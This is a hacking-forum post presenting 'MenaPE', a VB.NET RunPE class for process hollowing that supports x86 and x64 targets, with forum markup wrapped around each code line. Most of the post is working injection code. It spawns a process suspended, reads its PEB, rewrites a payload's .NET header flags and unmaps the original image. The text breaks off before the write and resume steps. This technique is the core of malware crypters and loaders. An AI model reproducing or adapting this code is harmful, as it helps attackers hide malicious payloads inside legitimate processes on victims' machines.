• Welcome to ForumKorner!
    Join today and become a part of the community.

MenaPE Usage! .Net RunPE x86<>x64!

Killpot

Member
Reputation
0
[font=Roboto, sans-serif]Yo. [/font]

[font=Roboto, sans-serif]So in this thread I will detail how to go about using Menalix's RunPE, called MenaPE. Here's a snippet of his description:[/font]

[font=Roboto, sans-serif]What I love about .NET is how we can manipulate with it in all kind of ways, due to the code is being JIT Compiled.[/font]
[font=Roboto, sans-serif]And this is kinda what this RunPE shows, normal RunPE’s can only do x86 -> x86 injections.[/font]
[font=Roboto, sans-serif]This RunPE can do ANY injection, yea even x86 -> x64 or x64 -> x86[/font]

[font=Roboto, sans-serif]Why? Well .NET is JIT Compiled, which means it isn’t really compiled yet when creating a .NET executeable,[/font]
[font=Roboto, sans-serif]a .NET executeable is like a wrapped executeable file with the instructions to how its gonna be JIT Compiled on run, so before its run we can manipulate just like we want with it.[/font]
[font=Roboto, sans-serif]Which means we can do RunPE Injections like x64 -> x86.[/font]

[font=Roboto, sans-serif]
So, How do we go about using this code?[/font]
Code:
Class MenaPE
Code:
Code:
Code:
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   '------------------------------[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   'Title: MenaPE (RunPE Class)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   'Author: Menalix[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   'Website: Menalix.com[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   'Notice: For teaching purposes[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   '------------------------------[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#Region "Static API Calls"[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Declare Function LoadLibraryA Lib "kernel32" (ByVal Name As String) As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Declare Function GetProcAddress Lib "kernel32" (ByVal hProcess As IntPtr, ByVal Name As String) As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#End Region[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#Region "Dynamic API Caller"[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Private Function CreateApi(Of T)(ByVal Name As String, ByVal Method As String) As T[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Return DirectCast(DirectCast(Runtime.InteropServices.Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(Name), Method), GetType(T)), Object), T)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   End Function[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#End Region[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#Region "Dynamic API's"[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Private Delegate Function ReadProcessMemoryParameters(ByVal hProcess As UInteger, ByVal lpBaseAddress As IntPtr, ByRef lpBuffer As Integer, ByVal nSize As IntPtr, ByRef lpNumberOfBytesWritten As IntPtr) As Boolean[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ReadOnly ReadProcessMemory As ReadProcessMemoryParameters = CreateApi(Of ReadProcessMemoryParameters)("kernel32", "ReadProcessMemory")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Private Delegate Function CreateProcessParameters( _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal ApplicationName As String, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal CommandLine As String, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal ProcessAttributes As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal ThreadAttributes As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal InheritHandles As Boolean, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal CreationFlags As UInteger, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal Environment As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal CurrentDirectory As String, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByRef StartupInfo As STARTUPINFO, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByRef ProcessInformation As PROCESS_INFORMATION) As Boolean[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Dim CreateProcess As CreateProcessParameters = CreateApi(Of CreateProcessParameters)("kernel32", "CreateProcessA")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Private Delegate Function NtQueryInformationProcessParameters(ByVal hProcess As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal ProcessInformationClass As Integer, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByRef ProcessInformation As PROCESS_BASIC_INFORMATION, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal ProcessInformationLength As UInteger, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByRef ReturnLength As UIntPtr) As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ReadOnly NtQueryInformationProcess As NtQueryInformationProcessParameters = CreateApi(Of NtQueryInformationProcessParameters)("ntdll", "NtQueryInformationProcess")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Private Delegate Function GetThreadContext64Parameters( _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal hThread As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByRef lpContext As CONTEXT32) As Boolean[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Dim GetThreadContext64 As GetThreadContext64Parameters = Nothing[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Private Delegate Function IsWow64ProcessParameters( _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal hProcess As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByRef Wow64Process As Boolean) As Boolean[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ReadOnly IsWow64Process As IsWow64ProcessParameters = CreateApi(Of IsWow64ProcessParameters)("kernel32", "IsWow64Process")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Private Delegate Function WriteProcessMemoryParameters( _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal hProcess As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal lpBaseAddress As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal lpBuffer As Byte(), _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal nSize As UInteger, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByRef lpNumberOfBytesWritten As UInteger) As Boolean[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ReadOnly WriteProcessMemory As WriteProcessMemoryParameters = CreateApi(Of WriteProcessMemoryParameters)("kernel32", "WriteProcessMemory")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Private Delegate Function NtUnmapViewOfSectionParameters( _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal hProcess As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal pBaseAddress As IntPtr) As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ReadOnly NtUnmapViewOfSection As NtUnmapViewOfSectionParameters = CreateApi(Of NtUnmapViewOfSectionParameters)("ntdll", "NtUnmapViewOfSection")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Private Delegate Function VirtualAllocExParameters( _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal hProcess As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal lpAddress As IntPtr, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal dwSize As UInteger, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal flAllocationType As UInteger, _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal flProtect As UInteger) As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ReadOnly VirtualAllocEx As VirtualAllocExParameters = CreateApi(Of VirtualAllocExParameters)("kernel32", "VirtualAllocEx")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Private Delegate Function ResumeThreadParameters( _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ByVal hThread As IntPtr) As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   ReadOnly ResumeThread As ResumeThreadParameters = CreateApi(Of ResumeThreadParameters)("kernel32", "ResumeThread")[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#End Region[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#Region "API Structures"[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Private Structure PROCESS_INFORMATION[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public hProcess As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public hThread As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public dwProcessId As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public dwThreadId As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   End Structure[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Private Structure STARTUPINFO[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public cb As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public lpReserved As String[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public lpDesktop As String[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public lpTitle As String[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=36)> _[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public Misc As Byte()[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public lpReserved2 As Byte[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public hStdInput As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public hStdOutput As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public hStdError As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   End Structure[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Structure FLOATING_SAVE_AREA[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Dim Control, Status, Tag, ErrorO, ErrorS, DataO, DataS As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=80)> Dim RegisterArea As Byte()[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Dim State As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   End Structure[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Structure CONTEXT32[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Dim ContextFlags, Dr0, Dr1, Dr2, Dr3, Dr6, Dr7 As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Dim FloatSave As FLOATING_SAVE_AREA[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Dim SegGs, SegFs, SegEs, SegDs, Edi, Esi, Ebx, Edx, Ecx, Eax, Ebp, Eip, SegCs, EFlags, Esp, SegSs As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       <System.Runtime.InteropServices.MarshalAs(System.Runtime.InteropServices.UnmanagedType.ByValArray, SizeConst:=512)> Dim ExtendedRegisters As Byte()[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   End Structure[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Structure PROCESS_BASIC_INFORMATION[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public ExitStatus As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public PebBaseAddress As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public AffinityMask As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public BasePriority As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public UniqueProcessID As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Public InheritedFromUniqueProcessId As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   End Structure[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#End Region[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]#Region "Injection"[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Public Function Run(ByVal path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       For I As Integer = 1 To 5[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           If HandleRun(path, payload, creationflag) Then Return True[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Next[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Return False[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   End Function[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]   Private Function HandleRun(ByVal Path As String, ByVal payload As Byte(), ByVal creationflag As Integer) As Boolean[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Dim ReadWrite As Integer = Nothing[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Dim QuotedPath As String = String.Format("""{0}""", Path)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Dim SI As New STARTUPINFO[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Dim PI As New PROCESS_INFORMATION[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       SI.cb = CUInt(Runtime.InteropServices.Marshal.SizeOf(GetType(STARTUPINFO))) 'Parses the size of the structure to the structure, so it retrieves the right size of data[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]       Try[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           'COMMENT: Creating a target process in suspended state, which makes it patch ready and we also retrieves its process information and startup information.[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           If Not CreateProcess(Path, QuotedPath, IntPtr.Zero, IntPtr.Zero, True, creationflag, IntPtr.Zero, IO.Directory.GetCurrentDirectory, SI, PI) Then Throw New Exception()[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           'COMMENT: Defines some variables we need in the next process[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim ProccessInfo As New PROCESS_BASIC_INFORMATION[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim RetLength As UInteger[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim Context = Nothing[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim PEBAddress32 As Integer = Nothing[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim PEBAddress64 As Int64 = Nothing[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim TargetIs64 As Boolean = Nothing[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim IsWow64Proc As Boolean = False[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           IsWow64Process(PI.hProcess, IsWow64Proc) 'COMMENT: Retrieves Boolean to know if target process is a 32bit process running in 32bit system, or a 32bit process running under WOW64 in a 64bit system.[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           If IsWow64Proc Or IntPtr.Size = 4 Then 'COMMENT: Checks the Boolean retrieved from before OR checks if our calling process is 32bit[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               Context = New CONTEXT32[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               Context.ContextFlags = &H1000002L 'COMMENT: Parses the context flag CONTEXT_AMD64(&H00100000L) + CONTEXT_INTEGER(0x00000002L) to tell that we want a structure of a 32bit process running under WOW64, you can see all context flags in winnt.h header file.[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               If IsWow64Proc AndAlso IntPtr.Size = 8 Then 'COMMENT: Checks if our own process is 64bit and the target process is 32bit in wow64[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]                   GetThreadContext64 = CreateApi(Of GetThreadContext64Parameters)("kernel32", "Wow64GetThreadContext") 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]                   If Not GetThreadContext64(PI.hThread, Context) Then Throw New Exception[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]                   Console.WriteLine(Context.Ebx)[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]                   PEBAddress32 = Context.Ebx[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]                   TargetIs64 = False[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               Else 'COMMENT: If our process is 32bit and the target process is 32bit we get here. [/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]                   NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]                   PEBAddress32 = ProccessInfo.PebBaseAddress[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]                   TargetIs64 = False[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Else 'COMMENT: If our process is 64bit and the target process is 64bit we get here. [/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               NtQueryInformationProcess(PI.hProcess, 0, ProccessInfo, Runtime.InteropServices.Marshal.SizeOf(ProccessInfo), RetLength) 'COMMENT: Retrieves a structure of information to retrieve the PEBAddress to later on know where we gonna use WriteProcessMemory to write our payload[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               PEBAddress64 = ProccessInfo.PebBaseAddress[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               TargetIs64 = True[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim BaseAddress As IntPtr[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           If TargetIs64 = True Then[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               ReadProcessMemory(PI.hProcess, PEBAddress64 + &H10, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 64bit Process, which is where the exe data starts[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Else[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               ReadProcessMemory(PI.hProcess, PEBAddress32 + &H8, BaseAddress, 4, ReadWrite) 'COMMENT: Reads the BaseAddress of a 32bit Process, which is where the exe data starts[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim PayloadIs64 As Boolean = False[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim dwPEHeaderAddress As Integer = BitConverter.ToInt32(payload, &H3C) 'COMMENT: Gets the PEHeader start address[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim dwNetDirFlags As Integer = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H398) 'COMMENT: Gets the .NET Header Flags value to determine if its a AnyCPU Compiled exe or not[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim wMachine As Integer = BitConverter.ToInt16(payload, dwPEHeaderAddress + &H4) 'COMMENT: Gets the reads the Machine value[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           If wMachine = 8664 Then : PayloadIs64 = True 'Checks the Machine value to know if payload is 64bit or not"[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Else : PayloadIs64 = False : End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           If PayloadIs64 = False Then[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               If dwNetDirFlags = &H3 Then 'To make sure we don't rewrite flags on a Payload which is already AnyCPU Compiled, it will only slow us down[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]                   Buffer.SetByte(payload, dwPEHeaderAddress + &H398, &H1) 'Replaces the .NET Header Flag on a 32bit compiled payload, to make it possible doing 32bit -> 64bit injection[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Dim dwImageBase As Integer[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           If PayloadIs64 = True Then[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H30) 'Reads the ImageBase value of a 64bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual addressstart location for our exe in its own memory space[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           Else[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               dwImageBase = BitConverter.ToInt32(payload, dwPEHeaderAddress + &H34) 'Reads the ImageBase value of a 32bit payload, it's kind of unnessecary as ImageBase should always be: &H400000, this is the virtual address start location for our exe in its own memory space[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           End If[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif][/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]           If dwImageBase = BaseAddress Then 'COMMENT: If the BaseAddress of our Exe is matching the ImageBase, it's because it's mapped and we have to unmap it[/font][/SIZE][/color]
[color=#a0a0a0][SIZE=3][font=Roboto, sans-serif]               If Not NtUnmapViewOfSection(PI.hProcess, BaseAddress) = 0 Then Throw New Exception() 'COMMENT: Unmapping it[/font][/SIZE][/color]
